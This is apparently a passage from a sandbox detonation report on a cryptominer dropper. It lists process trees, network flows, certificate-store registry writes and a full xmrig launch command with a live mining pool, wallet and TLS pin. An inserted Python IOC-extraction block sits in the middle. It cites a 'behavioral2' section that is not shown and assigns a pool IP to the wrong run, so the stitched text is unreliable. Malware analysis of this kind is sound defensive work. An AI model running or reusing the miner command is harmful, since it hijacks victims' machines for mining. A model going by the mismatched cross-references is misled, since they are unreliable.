memory/2904-48-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-49-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-50-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-51-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-52-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-53-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-54-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-55-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-56-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-57-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-58-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-59-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-60-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-61-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-62-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-63-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-64-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-65-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-66-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-67-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-68-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-69-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-70-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-71-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-72-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-73-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-74-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-75-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-76-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-77-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-78-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-79-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-80-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-81-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-82-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:42
Platform
win10v2004-20240611-en
Max time kernel
1793s
Max time network
1805s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1352 wrote to memory of 4596 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1352 wrote to memory of 4596 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4416,i,4778049104057176787,6631751660692402210,262144 --variations-seed-version --mojo-platform-channel-handle=3752 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4888,i,4778049104057176787,6631751660692402210,262144 --variations-seed-version --mojo-platform-channel-handle=1404 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| NL | 52.111.243.30:443 | | tcp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.150.79.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4596-14-0x000001D9435F0000-0x000001D943610000-memory.dmp
memory/4596-15-0x000001D943640000-0x000001D943660000-memory.dmp
memory/4596-16-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-18-0x000001D944F30000-0x000001D944F50000-memory.dmp
memory/4596-17-0x000001D944F10000-0x000001D944F30000-memory.dmp
memory/4596-19-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-20-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-21-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-22-0x000001D944F10000-0x000001D944F30000-memory.dmp
memory/4596-23-0x000001D944F30000-0x000001D944F50000-memory.dmp
memory/4596-24-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-25-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-26-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-27-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-28-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-29-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-30-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-31-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-32-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-33-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-34-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-35-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-36-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-37-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-38-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-39-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-40-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-41-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-42-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-43-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-44-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-45-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-46-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-47-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-48-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-49-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-50-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-51-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-52-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-53-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-54-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-55-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-56-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-57-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-58-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-59-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-60-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-61-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-62-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-63-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-64-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-65-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-66-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-67-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-68-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-69-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-70-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-71-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-72-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-73-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-74-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-75-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-76-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-77-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-78-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-79-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-80-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-81-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-82-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:43
Platform
win10v2004-20240508-en
Max time kernel
1579s
Max time network
1591s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:41
Platform
win10v2004-20240611-en
Max time kernel
1793s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5104 wrote to memory of 2256 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 5104 wrote to memory of 2256 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| BE | 2.17.107.114:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.64.52.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2256-14-0x00000202B9A50000-0x00000202B9A70000-memory.dmp
memory/2256-15-0x00000202B9AA0000-0x00000202B9AC0000-memory.dmp
memory/2256-16-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-18-0x00000202B9AC0000-0x00000202B9AE0000-memory.dmp
memory/2256-17-0x00000202B9AE0000-0x00000202B9B00000-memory.dmp
memory/2256-19-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-20-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-23-0x00000202B9AC0000-0x00000202B9AE0000-memory.dmp
memory/2256-22-0x00000202B9AE0000-0x00000202B9B00000-memory.dmp
memory/2256-21-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-24-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-25-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-26-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-27-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-28-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-29-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-30-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-31-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-32-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-33-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-34-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-35-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-36-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-37-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-38-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-39-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-40-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-41-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-42-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-43-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-44-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-45-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-46-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-47-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-48-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-49-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-50-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-51-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-52-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-53-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-54-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-55-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-56-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-57-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-58-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-59-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-60-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-61-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-62-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-63-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-64-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-65-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-66-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-67-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-68-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-69-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-70-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-71-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-72-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-73-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-74-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-75-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-76-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-77-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-78-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-79-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-80-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-81-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-82-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
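The same xmrig command line recurs in behavioral8, behavioral4 and behavioral9 below, and the pool resolves to a different host in behavioral9 (45.76.89.70) than here (95.179.241.203). As an added example that is not part of this report or of xmrig, the Python below pulls the pivot points out of the Processes and Network sections: it parses the xmrig command line (pool host and port, wallet, TLS pinning, donate level), checks the wallet against the Monero address shapes, and reduces the Network table to the tcp destinations that matter by dropping resolver traffic, reverse lookups and the bing.com background noise. The sample command line and table rows are copied from behavioral2 above; the ignore list is an analyst judgment and the short-option aliases follow xmrig's --help text, both assumptions of this example.

```python
"""Extract miner indicators from a Triage-style sandbox report.

Added example, not part of the sandbox report or of xmrig. SAMPLE_CMDLINE and
SAMPLE_NETWORK are constructed from the behavioral2 Processes and Network
sections (a subset of rows); the ignore list is an analyst assumption.
"""
import re
import shlex

# Monero mainnet address shapes: standard (95 chars, leading 4), subaddress
# (95 chars, leading 8), integrated (106 chars, leading 4); base58 alphabet.
_B58 = r"[1-9A-HJ-NP-Za-km-z]"
MONERO_ADDRESS = re.compile(rf"^(?:4{_B58}{{94}}|8{_B58}{{94}}|4{_B58}{{105}})$")

# xmrig short options and value-less flags, as listed by xmrig --help.
XMRIG_ALIASES = {"-o": "--url", "-u": "--user", "-p": "--pass", "-a": "--algo",
                 "-t": "--threads", "-k": "--keepalive", "-B": "--background"}
XMRIG_BOOL_FLAGS = {"--tls", "--keepalive", "--background", "--no-huge-pages", "--nicehash"}


def is_monero_address(s: str) -> bool:
    return bool(MONERO_ADDRESS.match(s))


def parse_xmrig_cmdline(cmdline: str) -> dict:
    """Pull pool, wallet and TLS settings out of an xmrig command line."""
    toks = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    opts, i = {}, 1                      # toks[0] is the executable
    while i < len(toks):
        key, _, inline_val = toks[i].partition("=")
        key = XMRIG_ALIASES.get(key, key)
        if not key.startswith("-"):
            i += 1                       # stray positional argument
            continue
        if inline_val:
            opts[key] = inline_val
        elif key in XMRIG_BOOL_FLAGS or i + 1 >= len(toks) or toks[i + 1].startswith("-"):
            opts[key] = True
        else:
            opts[key] = toks[i + 1]
            i += 1
        i += 1
    url = re.sub(r"^[a-z+]+://", "", opts.get("--url", ""))   # drop stratum+tcp:// etc.
    host, _, port = url.rpartition(":")
    if not host:
        host, port = url, ""
    wallet = opts.get("--user", "")
    return {
        "pool_host": host,
        "pool_port": int(port) if port.isdigit() else None,
        "wallet": wallet,
        "wallet_is_monero": is_monero_address(wallet),
        "tls": opts.get("--tls") is True,
        # xmrig speaks TLS on whatever port it is given; a pinned fingerprint
        # makes an intercepting proxy break the connection rather than see it.
        "tls_fingerprint": opts.get("--tls-fingerprint"),
        "donate_level": opts.get("--donate-level"),
    }


def external_destinations(network_table: str,
                          ignore_domains=frozenset({"www.bing.com", "g.bing.com"})) -> list:
    """Unique tcp destinations from a '| Country | Destination | Domain | Proto |'
    table, minus DNS traffic, reverse-lookup noise and ignored domains."""
    seen, out = set(), []
    for line in network_table.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Country":
            continue
        country, dest, domain, proto = cells
        if proto != "tcp" or domain.endswith(".in-addr.arpa") or domain in ignore_domains:
            continue
        if (dest, domain) not in seen:
            seen.add((dest, domain))
            out.append({"country": country, "dest": dest, "domain": domain})
    return out


def miner_iocs(cmdline: str, network_table: str) -> dict:
    """Join the command line with observed flows: which sockets served the pool?"""
    iocs = parse_xmrig_cmdline(cmdline)
    flows = external_destinations(network_table)
    iocs["pool_destinations"] = [f["dest"] for f in flows if f["domain"] == iocs["pool_host"]]
    iocs["other_destinations"] = [f["dest"] for f in flows if f["domain"] != iocs["pool_host"]]
    return iocs


# Constructed sample: the behavioral2 command line and a subset of its Network rows.
SAMPLE_CMDLINE = (
    r"xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 "
    "--user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR "
    "--pass T --donate-level 1 --tls "
    "--tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14"
)
SAMPLE_NETWORK = """\
| Country | Destination | Domain | Proto |
| BE | 2.17.107.114:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 146.177.190.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
"""

if __name__ == "__main__":
    for k, v in miner_iocs(SAMPLE_CMDLINE, SAMPLE_NETWORK).items():
        print(f"{k:20} {v}")
```

Two things the output makes visible. The pool is reached on tcp/80, yet the miner was started with --tls, so the port alone says nothing about whether the stratum traffic is cleartext. And --tls-fingerprint pins the pool certificate, so a TLS-inspecting proxy causes the miner to refuse the connection rather than expose its payload; that leaves the DNS query for pool.hashvault.pro and the flow to 95.179.241.203:80 as the network-side detection points, alongside the GitHub download of the stock xmrig-6.21.0 release that precedes it.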
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:42
Platform
win10v2004-20240611-en
